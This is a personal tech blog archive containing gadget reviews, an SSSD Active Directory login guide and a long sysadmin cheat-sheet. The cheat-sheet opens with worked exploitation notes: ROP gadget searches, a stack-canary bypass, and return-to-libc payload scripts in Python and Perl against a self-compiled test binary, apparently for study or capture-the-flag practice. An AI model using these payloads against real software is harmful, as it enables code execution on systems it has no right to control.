.random.tech.reviews.

Sunday, August 30, 2020

Thoughts on the Garmin Instinct Solar sports watch

These notes are in the context of me searching for a solar powered ABC watch with an accurate step counter.

My hope was that the Instinct Solar will be like the Casio solar powered watches where with normal exposure to natural and artificial light (indoors and outdoors) it will never run out of battery. Unfortunately that is not the case. 

On the Garmin watch, the solar charging works only in direct sunlight. It does not charge at all indoors either from natural nor artificial lights and very little outdoors in overcast conditions. You really need clear skies and the watch facing the sun for it to do it's magic. With the heart rate sensor turned off and only the step counter and ABC sensors active, you still need 3 hours of charging in direct sunlight for the watch to never run out of battery.

 The Instinct Solar has a few different watch faces with a maximum of four customizable data fields. No support for ConnecIQ unfortunately for me to create my own.

There's also the concern of the battery deteriorating over time. I observed that on my Garmin Fenix 3 watch. It started with 2 weeks of battery life when new and in less than 2 years it got to lasting only for about a week. Casio watches don't seem to have this issue since a 10 year old Pro Trek is still always charged (battery indicator shows "High") regardless of direct sunlight exposure.

Then there's the Casio G-Shock GBD-H1000 which is a solar powered GPS enabled running watch with ABC sensors that in theory should never run out of power as long as you don't use the GPS. The step counter on it however is so inaccurate that it's basically useless. Where Garmin watches count about 1k steps a day when i'm indoors and not leaving the house, the Casio counted ~ 10k steps! If only Garmin could license Casio's solar charging or Casio Garmin's step counter tech :)

Monday, February 06, 2017

Corporate Blacklist


DateNameReasonReference
06-Feb-2017 Vizio VIZIO’s televisions transmit information about what a consumer is watching on a second-by-second basis. The information is stored forever. link

Friday, September 11, 2015

Linux AD Authentication without joining the domain

If you want to authenticate to your Linux machine using your Microsoft AD accounts you can achieve that without having to join the domain.

Here's how you set it up on Ubuntu 14.04.

Install SSSD:
apt-get install sssd

Note: On Ubuntu the above command automatically edits /etc/nsswitch.conf as well as the appropriate PAM configuration files; you might have to do this yourself if you're installing on other Linux distros

Setup SSSD by putting this in: /etc/sssd/sssd.conf

[sssd]
config_file_version = 2
services = nss, pam
domains = MY_AD_DOMAIN.COM

[nss]
# the following 2 lines allow you to overwrite the "Unix Attributes" set on your AD (if any) and effectively eliminates the need to change anything on the AD server
default_shell = /bin/bash
override_homedir = /home/%u
filter_users = root
filter_groups = root
reconnection_retries = 3

[pam]

[domain/MY_AD_DOMAIN.COM]
#debug_level = 7
enumerate = False
case_sensitive = False
# always check with the AD server if the credentials are valid
cache_credentials = False
min_id = 100

# Providers
id_provider = ldap
auth_provider = ldap
access_provider = ldap
ldap_access_order = filter, expire
ldap_account_expire_policy = ad
# allow only users in a particular AD security group
ldap_access_filter = memberOf=CN=Admins,OU=Groups,DC=MY_AD_DOMAIN,DC=com
chpass_provider = ldap

# figure out the UID and GID for a linux user from the AD objectSID
ldap_id_mapping = True
# depending on how big the objectSID is on your AD server you might need to tweak the 3 lines below to avoid collisions
ldap_idmap_range_min = 100000
ldap_idmap_range_max = 2000100000
ldap_idmap_range_size = 800000

ldap_id_use_start_tls = True
# don't verify the certificate, unless you can obtain it from your AD server and install it on your Linux machine
ldap_tls_reqcert = never
ldap_schema = ad
ldap_tls_cacertdir = /etc/openldap/certs

ldap_search_base = OU=Users,OU=Objects,DC=MY_AD_DOMAIN,DC=com

# LDAP Class settings
ldap_user_object_class = user
ldap_user_name = sAMAccountName
ldap_user_principal = userPrincipalName

# LDAP connection settings
ldap_uri = ldaps://MY_AD_SERVER:MY_AD_PORT
# use a service account to bind
ldap_default_bind_dn = CN=MY_SERVICE_ACCOUNT,OU=Users,OU=Objects,DC=MY_AD_DOMAIN,DC=com
ldap_default_authtok_type = obfuscated_password
ldap_default_authtok = MY_OBFUSCATED_PASSWORD
###

For some reason SSSD will refuse to start if the permissions on the config file are not set to 600 so:
chmod 600 /etc/sssd/sssd.conf 

Wednesday, September 14, 2011

Dell Precision M6600 quick review


Quick specs
  • Intel Core i7 2820QM 2.30GHz
  • 4x4GB DDR3 RAM @ 1333MHz
  • 2x2.5" 7200RPM 500GB SATA HDDs in RAID1 setup
  • Nvidia Quadro 3000M w/ 2GB RAM and Intel HD Graphics 3000
  • 17.3" FHD 16:9 LED (UltraSharp) multi-touch screen (1920x1080) w/ stylus, webcam and mic
  • Intel Centrino Ultimate-N 6300 802.11 AGN wifi + bluetooth
  • Slot Load DVD+-R/RW w/Double Layer
  • 9-cell 3760MAh 97Wh battery
  • Weight 7.77lb (3.6kg)
Details
Performance
The laptop comes with windows 7 professional 64-bit. It boots from power-on to login screen in 45 sec (in a RAID1 setup with 2x500GB 7200rpm SATA disks). Shut down takes 14 seconds from clicking the button (while logged in) to power-off. Going to sleep takes 7 seconds and waking up - 3 seconds. The OS and all the bundled software take about 43gigs and the recovery partition is 752megs.

Windows experience index:

On AC power in "Ultra Performance" profile - 5.2

Super PI for 1mil and 8mil (on AC power):

CrystalDiskMark and HD Tune Pro:


PCMark05:
On AC power with Nvidia videocard in "Ultra Performance" profile - 10394
On battery power with Nvidia videocard in "Ultra Performance" profile - 8726
On battery power with Intel videocard in "Power Saving" profile - 5335 (about 64% slower)

3DMark06:

On AC power with Nvidia videocard in "Ultra Performance" mode - 14208

On battery power with Nvidia videocard in "Ultra Performance" mode - 2766

On battery power with Intel videocard in "Power Saving" mode - 2526 (9% slower)

What's in the box
AC adapter, manuals, stylus, resource media CD.

Friday, February 04, 2011

HP Envy 14 (1110NR) review



Quick specs
  • Intel Core i5 460M 2.53GHz
  • 2x2GB DDR3 RAM @ 667MHz
  • 2.5" 7200RPM 640GB Samsung SATA HDD
  • ATI Mobility Radeon HD 5650 w/ 1GB RAM and Intel GMA HD Graphics
  • 14.5" 16:9 LED (HP Brightview Infinity) screen (1366x768) w/ webcam and stereo mic
  • Intel Centrino Advanced-N 6200 802.11 AGN wifi + bluetooth
  • Super Multi 8X DVD+-R/RW w/Double Layer
  • 8-cell 3760MAh 59Wh battery
  • Weight 5.4lb (2.44kg)

Design
This is arguably the best looking consumer HP laptop right now. The minimalistic approach, the simple design and the quality materials make it stand out. It's got an all over aluminum body that feels well built (except the battery cover, see below).

Ports and layout:
Like most laptops in a while this one has all the ports on the sides.


On the right side we have: USB/e-SATA port, HDMI, mini DisplayPort, kensington lock, network and AC. It's worth noting that the power and drive activity lights are also on this side. They're out of direct sight.

On the left side we have: slot-loading optical drive, 2 USBs, headphone/mic jack, headphone jack.

The speakers are located in the front of the laptop. They provide mediocre sound with very little bass. I was expecting more from the "beatsaudio" edition of this laptop. Turns out what it does is allow you to "hear what the artist hear" if you buy a pair of beats headphones. I'd much rather have better speakers, than this gimmick that makes you buy special headphones. Also in the front right corner of the laptop there's a SD/MMC card reader.

Display
This laptop has a 14.5" LED (HP Brightview Infinity) edge-to-edge glossy screen, 16:9 aspect ratio and a resolution of 1366x768. I feel this is not enough and that 1600x900 would look much better. On top it has a webcam with great video quality and 2 microphones. The horizontal viewing angels are ok while the vertical ones are mediocre. Also, being glossy you can use it as a mirror when dark surfaces are displayed so it can be challenging to view outdoors.


This is how bright the screen is compared to a Dell XPS-1645 (on the left) that has a RGBLED display, both on maximum brightness:


Keyboard and touchpad:

The touchpad, even tho it's big and matte, is not good. Its major flaw is that it does not separate the "buttons" from the touchpad area. It's all one big touch-sensitive surface with the bottom part also playing the role of the buttons. If you have a finger on the touchpad and try to click a mouse "button" with another finger, the cursor jumps to the bottom of the screen. You have to take your firs finger off, click the mouse button, then resume moving the cursor. Also the entire area of the touchpad pushes in when you perform a "button" click which can be a little distracting too. Tapping twice on the white dot in the upper left corner will disable the touchpad completely, presumably for gaming or when you're using an external mouse.


The chiclet style back-light keyboard feels solid and does not bend or twist when typing. One strange thing i noticed is that the Ctrl key seems to play the role of the Fn button, and the Fn button needs to be pressed when you want to hit any F-keys. Changing the screen brightness, for example, is done by pressing Ctrl-F2/Ctrl-F3 (instead of Fn-F2/Fn-F3) but if you want to press Alt-F4 you have to do Fn-Alt-F4. This is how the backlight looks in the dark:


Battery and AC adapter:
The laptop came with a 8-cell 3760MAh 59Wh battery. It comes pre-installed and is located completely within the laptop's chassis, under a cover panel. Also located here is the hard drive, so no need to unscrew anything else to replace it. The cover itself feels a little flimsy when on as it does not fit tightly enough and can wiggle a bit when you pick up the laptop. This definitely detracts from an otherwise solid build quality.


The power adapter is not too big.


An interesting aspect of this laptop is that it has two videocards. By default, if you're on AC it uses the ATI Mobility Radeon HD 5650, but if you're on battery power it switches to the Intel HD. I wonder how inefficient the ATI videocard is at saving power if HP choose to have a second one in there :)

On the software side you get windows 7 home premium 64-bit. It boots from power-on to login screen in 51 sec. Shut down takes 11 seconds from clicking the button to power-off. Going to sleep takes 6 seconds and waking up - 4 seconds. The OS and all the bundled software take about 35gigs and the recovery partition is 25gigs.

Windows experience index:
On AC power in "High Performance" profile - 5.9

Super PI for 1mil and 8mil (on AC power):

 CrystalDiskMark:

PCMark05:
On AC power with ATI videocard in "High Performance" profile - 8008
On battery power with ATI videocard in High Performance" profile - 8055
On battery power with Intel videocard in "Power Saving" profile - 5505 (about 46% slower)

3DMark06:
On AC power with ATI videocard in "High Performance Mode" - 6949

 On battery power with ATI videocard in "High Performance Mode" - 6948

On battery power with Intel videocard in "High Performance Mode" - 1975 (251% slower)

Wi-fi speed (on AC power):
Tested on Asus RT-N16 b/g/n wireless router at a distance of 5 feet (2 meters).
 On 802.11g it averages to 1.8MB/s - aprox. 30% link utilization

On 802.11n it connects at 144Mbps and averages to 6.6MB/s - aprox. 45% link utilization
 
AC adapter, manuals, 2gb sd card, cloth pouch.

Pros
- good specs
- back-light keyboard
- slot loading optical drive (on the left side too)
- aluminum case
- great build quality

Cons
- crap beats speakers (no bass at all)
- low resolution (1366x768) glossy screen
- horrible touchpad
- flimsy battery cover

Conclusion
This laptop has had the potential to become HP's best yet, with its beautiful design, great aluminum body and good specs. Unfortunately it's being held back by the low screen resolution and the terrible touchpad. The flimsy battery cover also detracts from the otherwise really well build chassis. So close guys, but no cigar. At least not yet.

Thursday, October 21, 2010

Tech Cheat-sheet

Firefox/Chrome: reload tab with javascript (no extensions)
console> win1 = window.open("https://ifconfig.io");
console> timer1 = setInterval( function(){ win1.location.href="https://ifconfig.io" }, 1*60*1000 ); # every 1 min
 
Linux: find execve("/bin/sh") rop gadget manually
bash> ldd ./mybinary
linux-vdso.so.1 =>  (0x00007ffff7ffd000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7c29000)
/lib64/ld-linux-x86-64.so.2 (0x0000555555554000)
bash> strings -tx /lib/x86_64-linux-gnu/libc.so.6 | grep "/bin/bash"
180543 /bin/sh
bash> objdump -M intel -d /lib/x86_64-linux-gnu/libc.so.6 | grep -B execve | grep 180543 -A5
   e9421:    48 8d 3d 1b 71 09 00     lea    rdi,[rip+0x9711b]        # 180543 <_libc_intl_domainname+0x242>
   e9428:    48 8b 10                 mov    rdx,QWORD PTR [rax]
   e942b:    e8 00 bd fd ff           call   c5130 <execve>
--
--
   ea379:    48 8d 3d c3 61 09 00     lea    rdi,[rip+0x961c3]        # 180543 <_libc_intl_domainname+0x242>
   ea380:    48 8b 10                 mov    rdx,QWORD PTR [rax]
   ea383:    e8 a8 ad fd ff           call   c5130 <execve>
bash> gdb ./mybinary
gdb-peda$ break main
gdb-peda$ run
gdb-peda$ vmmap
Start              End                Perm    Name
0x00400000         0x00401000         r-xp    /tmp/test
0x00600000         0x00601000         r--p    /tmp/test
0x00601000         0x00602000         rw-p    /tmp/test
0x00007ffff7a11000 0x00007ffff7bcf000 r-xp    /lib/x86_64-linux-gnu/libc-2.19.so
....
gdb-peda$ x/3i 0x00007ffff7a11000+0xe9421
0x7ffff7afa421 <exec_comm+1281>:    lea    rdi,[rip+0x9711b]        # 0x7ffff7b91543
0x7ffff7afa428 <exec_comm+1288>:    mov    rdx,QWORD PTR [rax]
0x7ffff7afa42b <exec_comm+1291>:    call   0x7ffff7ad6130 <__execve>

Linux: 64bit returl-to-libc gets() stack overflow canary bypass # -ASLR +NX
gcc -o mybinary mybinary.c
+--------+--------+---------+-----------------+----------+------------+----------+
|AAAAAAAA|CANNARYV|QWORD PAD|addr(pop rdi;ret)|addr("sh")|addr(system)|addr(exit)|
+--------+--------+---------+-----------------+----------+------------+----------+

1. find the offset N on the stack that overwirtes RIP, the CANNARY lives 16 bytes earlier
2. find address of "pop rdi;ret", system(), "sh", exit()
3. create the payload (in python)
import struct as s
sys = 0x7ffff7a57590     # sytem()
exi = 0x7ffff7a4d1e0     # exit()
cmd = 0x7ffff7a21dfe     # null-terminated arg for system
pad = 0x1111111111111111 # random qword
pop = 0x400643           # pop rdi; ret
print "A"*N + "CANNARYV" + s.pack("<Q",pad) + s.pack("<Q",pop) + s.pack("<Q",cmd) + s.pack("<Q",sys) + s.pack("<Q",exi)
4. save the pattern in a file
bash> python own.py > pattern
5. run the program in gdb and patch the cannary value after gets() executes
gdb-peda$ pdisass main
Dump of assembler code for function main:
   0x000000000040059d <+0>:    push   rbp
   0x000000000040059e <+1>:    mov    rbp,rsp
   0x00000000004005a1 <+4>:    add    rsp,0xffffffffffffff80
   0x00000000004005a5 <+8>:    mov    DWORD PTR [rbp-0x74],edi
   0x00000000004005a8 <+11>:   mov    QWORD PTR [rbp-0x80],rsi
   0x00000000004005ac <+15>:   mov    rax,QWORD PTR fs:0x28
   0x00000000004005b5 <+24>:   mov    QWORD PTR [rbp-0x8],rax
   0x00000000004005b9 <+28>:   xor    eax,eax
   0x00000000004005bb <+30>:   lea    rax,[rbp-0x70]
   0x00000000004005bf <+34>:   mov    rdi,rax
   0x00000000004005c2 <+37>:   call   0x4004a0 <gets@plt>
   0x00000000004005c7 <+42>:   mov    rdx,QWORD PTR [rbp-0x8]
   0x00000000004005cb <+46>:   xor    rdx,QWORD PTR fs:0x28
   0x00000000004005d4 <+55>:   je     0x4005db <main+62>
   0x00000000004005d6 <+57>:   call   0x400470 <__stack_chk_fail@plt>
   0x00000000004005db <+62>:   leave
   0x00000000004005dc <+63>:   ret
End of assembler dump.
gdb-peda$ break *0x00000000004005b5
gdb-peda$ break *0x00000000004005c7
gdb-peda$ run < pattern
gdb-peda$ p $rax
$1 = 0x8393371af6b62200 <- this is the cannary value
gdb-peda$ continue
gdb-peda$ patch $rbp-0x8 0x8393371af6b62200
Written 8 bytes to 0x7fffffffed68
gdb-peda$ continue

Linux: 64bit return-to-libc gets() stack overflow exploit # -ASLR +NX
gcc -o mybinary -fno-stack-protector mybinary.c
+------------+-----------------+----------+------------+----------+
|AAAAAAAAAAAA|addr(pop rdi;ret)|addr("sh")|addr(system)|addr(exit)|
+------------+-----------------+----------+------------+----------+

note:
on 64bit arg to system() needs to be in RDI
pop rdi - load next qword from stack into RDI, ex: addr("sh")
ret - execute next instruction on the stack, ex: addr(system)

1. find the offset N on the stack that overwrites RIP
2. find address of "pop rdi;ret" rop gadget so we can pass args to functions
gdb-peda$ break main
gdb-peda$ run
gdb-peda$ ropsearch "pop rdi"
0x004005b3 : (b'5fc3') pop rdi; ret
3. find address of system() and exit()
gdb-peda$ print system
gdb-peda$ print exit
4. find addr of "sh" string somewhere in memory ending with NULL (0x00)
gdb-peda$ find "sh"
libc : 0x7ffff7a22c37 --> 0x6572687470006873 ('sh')
gdb-peda$ hexdump 0x7ffff7a22c37
0x00007ffff7a22c37 : 73 68 00 70 74 68 72 65 61 64 5f 63 6f 6e 64 5f sh.pthread_cond_
5. create the payload (with perl) - this will only work with gets() as strcpy() ignores NULL bytes
print "A"xN . "\xb3\x05\x40\x00\x00\x00\x00\x00" . "\x37\x2c\xa2\xf7\xff\x7f\x00\x00" . "<addr_of_system>" . "<addr_of_exit>"

Linux: ASM: argument passing to functions 32bit vs 64bit
32bit binaries pass arguments to function on the stack:

-4  | addr(param2)
-8  | addr(param1)
-12 | addr(ret)
-16 | addr(func)


64bit binaries pass arguments to function in registers:

RDI - first arg
RSI - second arg
RDX - third arg
RCX - fourth arg
R8 - fifth arg
R9 - sixth arg


Only the 7th+ arguments are passed on the stack.

Linux: 32bit return-to-libc gets() stack overflow exploit # +ASLR +NX
gcc -o mybinary -fno-stack-protector -m32 mybinary.c
+------------+------------+----------+-----------+
|AAAAAAAAAAAA|addr(system)|addr(exit)|addr(ENVAR)|
+------------+------------+----------+-----------+
    args      EBP

import struct as s
import subprocess as sp

# after mybinary is started and waiting for input find addresss of libc and stack

libc = sp.Popen("cat /proc/`pidof mybinary`/maps | grep libc | head -1 | awk -F- '{ print $1 }'", shell=True, stdout=sp.PIPE).stdout.read()
stack_top = sp.Popen("cat /proc/`pidof mybinary`/maps | grep stack | awk '{ print $1 }' | awk -F- '{ print $2 }'", shell=True, stdout=sp.PIPE).stdout.read()

# find constant offset b/w libc and addr with peda "distance"

sys = hex(int(libc,16) + 262928)        # addr of system() = libc + constant offset
exi = hex(int(libc,16) + 209504)        # addr of exit() = libc + constant offset
env = hex(int(stack_top,16) - 60)       # addr of ENVAR = top of stack - some offset

  # points right at this location                                 -60 v---------------------------------+ stack_top
  # bash> cat in | env -i PWD="/tmp" SHELL="/bin/bash" SHLVL=0 ENVAR="    ls -l;id;whoami;cat /root/flag" /tmp/mybinary

print "A" * 503 + s.pack("<I",int(sys,16)) + s.pack("<I",int(exi,16)) + s.pack("<I",int(env,16)) + "AAA" # python own.py > in


Linux: writing to stdin of a process after you start it
bash> mkfifo /tmp/input
bash> cat /tmp/input | myproc
bash> cat file > /tmp/input


Linux: 32bit return-to-libc stack overflow exploit # -ASLR +NX
gcc -o mybinary -fno-stack-protector -m32 mybinary.c
+--------------+--------+--------+-------------+
| AAAAAAAAAAAA |system()|ret_addr|arg_to_system|
+--------------+--------+--------+-------------+
      args      EBP

1. find the offset N on the stack that overwrites EIP
2. the payload will have to be in the format "A"xN + addr of system() + addr of exit() + addr of "sh"
3. find address of system() and exit()
(gdb) break main
(gdb) run
(gdb) print system
(gdb) print exit
4. find addr of "sh" string somewhere in memory ending with NULL (0x00)
(gdb) info proc map # vmmap in peda
process 3000
Mapped address spaces:
    Start Addr   End Addr       Size     Offset objfile
     0x8048000  0x8049000     0x1000        0x0 /tmp/test
     0x8049000  0x804a000     0x1000        0x0 /tmp/test
     0x804a000  0x804b000     0x1000     0x1000 /tmp/test
    0xf7e1e000 0xf7e1f000     0x1000        0x0
    0xf7e1f000 0xf7fca000   0x1ab000        0x0 /lib/i386-linux-gnu/libc-2.19.so
    0xf7fca000 0xf7fcc000     0x2000   0x1aa000 /lib/i386-linux-gnu/libc-2.19.so
    0xf7fcc000 0xf7fcd000     0x1000   0x1ac000 /lib/i386-linux-gnu/libc-2.19.so
    0xf7fcd000 0xf7fd0000     0x3000        0x0
    0xf7fda000 0xf7fdb000     0x1000        0x0
    0xf7fdb000 0xf7fdc000     0x1000        0x0 [vdso]
    0xf7fdc000 0xf7ffc000    0x20000        0x0 /lib/i386-linux-gnu/ld-2.19.so
    0xf7ffc000 0xf7ffd000     0x1000    0x1f000 /lib/i386-linux-gnu/ld-2.19.so
    0xf7ffd000 0xf7ffe000     0x1000    0x20000 /lib/i386-linux-gnu/ld-2.19.so
    0xfffdd000 0xffffe000    0x21000        0x0 [stack]
(gdb) find 0xf7e1f000,0xf7fca000,"sh" # find "sh" in peda
0xf7e2d469
0xf7e2e3a8
...
11 patterns found.
(gdb) x/s 0xf7e2d469
0xf7e2d469:    "sh"
5. create the payload (with perl) - this will only work with gets() as strcpy() ignores NULL bytes
print "A"xN."<addr_of_system>"."<addr_of_exit>"."\x69\xd4\xe2\xf7"

Linux: shellcode repo
http://shell-storm.org/shellcode/

Linux: basic stack overflow exploit # -ASLR -NX
gcc -o mybinary -fno-stack-protector -z execstack -m32 mybinary.c
+--------------+-----+-----------+
| AAAAAAAAAAAA | RET | SHELLCODE |
+--------------+-----+-----------+
      args      EBP

Running your program with identical stacks in the terminal and in gdb:

bash> env -i PWD="/tmp" SHELL="/bin/bash" SHLVL=0 /bin/bash -c "(cat exploit; cat) |  /tmp/mybinary"
bash> env -i PWD="/tmp" SHELL="/bin/bash" SHLVL=0 gdb  /tmp/mybinary"

Within gdb, make sure to unset env LINES and env COLUMNS

Linux: ASM: stack frame

Apache: mod_rewrite simulator
http://htaccess.madewithlove.be/

Apache: Turn off server signature for production
#httpd.conf
ServerSignature Off
ServerTokens Prod


AWK: Remove duplicate lines from a file:
bash> awk '!x[$0]++' file.txt

AWS: CLI: Environment variables
bash> AWS_ACCESS_KEY_ID=XXX AWS_SECRET_ACCESS_KEY=XXX aws s3 ls

AWS: ELB: Converting certificate private key into PEM format acceptable by ELB
bash> openssl rsa -in my-openssl-pk -outform PEM > my-openssl-pk.pem

AWS: S3: URL for S3 buckets
http://bucket_name.s3.amazonaws.com/

AWS: S3: IAM policy for granting full access to a single bucket from a specific IP range
{
"Statement": [
{
"Effect": "Allow",
"Action": ["s3:GetBucketLocation", "s3:ListAllMyBuckets"],
"Resource": "arn:aws:s3:::*",
"Condition": {
"IpAddress": { "aws:SourceIp": ["1.1.1.1/16", "2.2.2.2/30"] }
}
},
{
"Effect": "Allow",
"Action": "s3:*",
"Resource": [ "arn:aws:s3:::bucket_name", "arn:aws:s3:::bucket_name/*"],
"Condition": {
"IpAddress": { "aws:SourceIp": ["1.1.1.1/16", "2.2.2.2/30"] }
}
}
]
}


AWS: S3: Bucket policy for granting full access to a single bucket from a specific IP range
{
"Statement": [
{
"Effect": "Allow",
"Principal": "*",
"Action": ["s3:GetBucketLocation", "s3:ListAllMyBuckets"],
"Resource": [ "arn:aws:s3:::*" ],
"Condition": {
"IpAddress": { "aws:SourceIp": ["1.1.1.1/16", "2.2.2.2/30"] }
}
},
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:*",
"Resource": [ "arn:aws:s3:::bucket_name", "arn:aws:s3:::bucket_name/*"],
"Condition": {
"IpAddress": { "aws:SourceIp": ["1.1.1.1/16", "2.2.2.2/30"] }
}
}
]
}


AWS: RDS: MySQL: Import Issue
ERROR 1227 (42000) at line X: Access denied; you need (at least one of) the SUPER privilege(s) for this operation
If you get this error first in the parameter group for the RDS you're importing into try setting "log_bin_trust_function_creators = 1". If that does not help than the DEFINER statement in your trigger definition is wrong. Open the sql file with vim and go to line X. See what DEFINER statement looks like and either correct it so it matches the user you're importing as or just delete it completely (:%s/DEFINER=`user`@`host`//g). The import should work now.

AWS: RDS: MySQL: Grant all privileges to DB user
Generally "GRANT ALL ON *.*" on RDS will fail because the root account does not have SUPER user privileges. MySQL however allows the use of `%` or "_" as wildcards for the database, which will allow GRANT on all of the user-created databases and tables.
mysql> GRANT ALL ON `%`.* TO user@'%' IDENTIFIED BY 'password'; 

AWS: RDS: MySQL: Rotate mysql.general_log and mysql.slow_log table
mysql> CALL mysql.rds_rotate_general_log;
mysql> CALL mysql.rds_rotate_general_log;

AWS: RDS: MySQL: Skip a SQL operation if replication gets stuck
1. Connect with mysql command to slave
2. CALL mysql.rds_skip_repl_error;

Git: Permanently cache credentials
For buildmachines it's useful to permanently cache the git service account
bash> git config --global credential.helper store

Haproxy: Setup logging properly through rsyslogd
# haproxy.cfg
log /dev/log local1 info
###
# rsyslog.conf
# if haproxy logs are also being written to /var/log/messages you can exclude them
*.info;mail.none;authpriv.none;cron.none;local1.none /var/log/messages
###
# rsyslog.d/10-haproxy.conf
$AddUnixListenSocket /var/lib/haproxy/dev/log # if haproxy is being chrooted to /var/lib/haproxy, run: mkdir /var/lib/haproxy/dev
if $programname startswith 'haproxy' then /var/log/haproxy.log
&~
###

Haproxy: Maintenance mode on demand
# haproxy.cfg
global
stats socket /var/lib/haproxy/stats mode 600 level admin
###
bash> mkdir -p /var/lib/haproxy/
# install socat tool
bash> echo "disable server <backend>/<server-name>" | socat stdio /var/lib/haproxy/stats
bash> echo "enable server <backend>/<server-name>" | socat stdio /var/lib/haproxy/stats


LDAP: ldapsearch
bash> ldapsearch -x -h 1.2.3.4 -D "CN=My Name,OU=Mailboxes,DC=company,DC=com" -W -b 'CN=John Doe,OU=Mailboxes,DC=company,dc=com';
bash> ldapsearch -x -h ad.mydomain.com -D "username" -W password -b "OU=Users, OU=Myorg, dc=mydomain, dc=com";

Linux: bash: parallel runs of a process in N batches 
#!/bin/bash
N=4; i=1 # 3 parallel threads
(
for thing in a b c d e f g; do 
    ((i=i%N)); ((i++==0)) && wait
    my-cmd ${thing} & 
done
)

Linux: rsyslog: disable rate limit
# /etc/rsyslog.conf
$SystemLogRateLimitInterval 0
$SystemLogRateLimitBurst 0
###


Linux: Sysctl: enable VM address space layout randomization
# in /etc/sysctl.conf
kernel.randomize_va_space = 2


Linux: IPTABLES: Connection throttling
Drop incoming connections which make more than 5 connection attempts on port 22 within 60 seconds:
bash> iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent --set
bash> iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent --update --seconds 60 --hitcount 5 -j DROP

Linux: IPTABLES: Block by matching string
Block DNS resolution for a domain containing "firefox"
bash> iptables -A OUTPUT -p udp -m upd --dport 53 -m string --string "firefox" --algo bm -j REJECT
 
Block HTTPS connections with "googleuser" in URL 
bash> iptables -A OUTPUT -p tcp -m tcp --dport 443 -m string --string "googleuser" --algo bm -j REJECT
 
MSSQL: Find out what IP address you're connecting from
SELECT client_net_address FROM sys.dm_exec_connections WHERE session_id = @@spid

MySQL: Obtain a copy of the database for setting up a replica (with minimal locking)
bash> mysqldump --databases --master-data --routines --single-transaction my_db_name > my_db_name.sql

MySQL: Make a backup without locking the database (for InnoDB engine only)
bash> mysqldump --single-transaction --routines my_db_name > my_db_name.sql

MySQL: Skip a SQL operation if replication gets stuck
Connect with mysql command to slave
mysql> SHOW SLAVE STATUS \G
mysql> STOP SLAVE;
mysql> SET GLOBAL SQL_SLAVE_SKIP_COUNTER = 1;
mysql> START SLAVE;

OpenSSH: Generate Public key from a Private key
bash> ssh-keygen -y -f id_rsa > id_rsa.pub

OpenSSL: Generate Self-Signed SSL certificate
bash> openssl req -x509 -newkey rsa:2048 -nodes -keyout key.pem -out cert.pem -days 1234

OpenSSL: Encrypt a string using AES-128-CBC and base64 encode it
bash> openssl aes-128-cbc -K <encryption_key_hex> -iv <initialization_vector_hex> -in file.orig -a

Splunk: UF: Renaming Hosts
Method 1: To change the host name reported on the Splunk Web UI, on the forwarding agent edit the following file "/opt/splunkforwarder/etc/system/local/inputs.conf" then restart the splunk agent.
Method 2: After changing the hostname for a machine or before making an AMI make sure to stop splunk forwarder and run:
bash> splunk clone-prep-clear-config

Splunk: UF: Check Status of Universal Forwarder
On the machine running the Splunk Universal Forwarder open a browser and go to:
https://localhost:8089/services/admin/inputstatus/TailingProcessor:FileStatus

Or from the command line:
/opt/splunkforwarder/bin/splunk _internal call /services/admin/inputstatus/TailingProcessor:FileStatus 

Splunk: UF: Reindex all files on a host
1. On any Search Head - delete the respective data from the indexers first, otherwise there will be duplicates after the reindex; log in as admin and pipe the search results you want gone to the delete command (i.e. sourceytpe=balh | delete), make sure to do it for "All time" time period
2. On the machine with the Universal Forwarder - delete the fishbucket: rm -rf /opt/splunkforwarder/var/lib/splunk/fishbucket && /etc/init.d/splunk restart

NOTE
If files monitored by splunk UF have not had any logs in them in the last few hours you might need to "echo "test" >> monitored_log_file" before step 2 above will work

Splunk: UF: Autoscaling
When running the Splunk UF on an ASG you can't use the IP address or hostname of the instances for controlling things on the Splunk deployment server, instead you can use the clientName. Here's now you set it up on the UF

# add below lines to /opt/splunkforwarder/etc/system/local/deploymentclient.conf
[deployment-client]
clientName = my-host-name

TAR: copy directory to another server and preserve permissions
bash> tar cf - /my/dir | ssh user@host tar xf - -C /your/dir


TeamPass: Custom improvements
items.load.php:
> ZeroClipboard.setMoviePath("<?php echo $_SESSION['settings']['cpassman_url'];?>/includes/js/zeroclipboard/ZeroClipboard.swf");
< ZeroClipboard.setMoviePath("https://teampass.ecs.autodesk.com/teampass/includes/js/zeroclipboard/ZeroClipboard.swf");
items.php:
> id="pw_size" value="8" 
> id="edit_pw_size" value="8" 
< id="pw_size" value="16" 
< id="edit_pw_size" value="16"


Ubuntu: Disable upstart job from running at boot time
# echo 'manual' > /etc/init/SERVICE.override
bash> echo 'manual' > /etc/init/rpcbind.override

Ubuntu: Upstart init script template
#/etc/init/nodejs.conf
description "node"
author "admin@company.com"

respawn
respawn limit 20 5

start on runlevel [2345]
stop on runlevel [^2345]

# set limit on number of opened files
limit nofile 65535 65535

script
   exec sudo -u www-data NODE_ENV=prod /usr/bin/nodejs /var/www/server.js >> /var/log/nodejs.log 2>&1
end script
###


Ubuntu: Systemv init script template
#/etc/init.d/my_service

### BEGIN INIT INFO
# Provides: my_service
# Required-Start:
# Required-Stop:
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Description: Start my_service at boot time
### END INIT INFO

SERVICE="my_service"
CMD=/usr/bin/my_service

case $1 in
"start")
echo "Starting $SERVICE"
;;
"stop")
echo "Stopping $SERVICE"
;;
"restart")
echo "Restart $SERVICE"
;;
"status")
echo "$SERVICE Status"
pidof $CMD
;;
*)
echo "Invalid Option"
echo "Valid Options: start|stop|restart|status"
;;
esac
###


To enable my_service to start/stop automatically run the following:
bash> update-rc.d my_service defaults
bash> update-rc.d my_service enable


Ubuntu: Duo Authentication
# create /etc/apt/sources.list.d/duosecurity.list containing the line below
deb http://pkg.duosecurity.com/Ubuntu trusty main

curl -s https://www.duosecurity.com/APT-GPG-KEY-DUO | sudo apt-key add -
apt-get update && apt-get install duo-unix

# edit /etc/pam.d/common-auth and add the following line AFTER pam_deny.so line
auth requisite /lib64/security/pam_duo.so

### edit /etc/ssh/sshd_config
UsePAM yes
ChallengeResponseAuthentication yes
UseDNS no

# decide what to do about pubkey authentication as if that succeeds SSH skips PAM
# add below to the end of sshd_config to allow ssh keys only from restricted networks
PubkeyAuthentication no
Match Address 1.1.1.1/16,2.2.2.2/16
PubkeyAuthentication yes
###
